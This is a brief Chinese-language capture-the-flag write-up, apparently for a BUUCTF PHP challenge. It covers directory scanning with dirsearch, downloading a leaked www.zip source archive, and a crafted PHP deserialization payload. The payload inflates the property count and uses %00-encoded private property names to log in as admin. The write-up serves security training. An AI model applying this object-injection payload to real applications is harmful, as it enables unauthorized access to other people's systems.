打开题目

游戏界面
猜测php里面有文件,我们可以用dirsearch
扫描一下这个服务器
执行命令
dirsearch -u http://2999dfd5-1d43-4a81-a088-9e41c9dccab4.node4.buuoj.cn/ -e php > test.log
最后在log文件中找到一个 200 www.zip
浏览器输入payload下载下来

得到目录文件

解读一下php代码,进行反序列化
payload
?select=O:4:"Name":3:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
但是发现这个里面有空格,所以把空格url编码变成%00再传参
Payload:
/?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
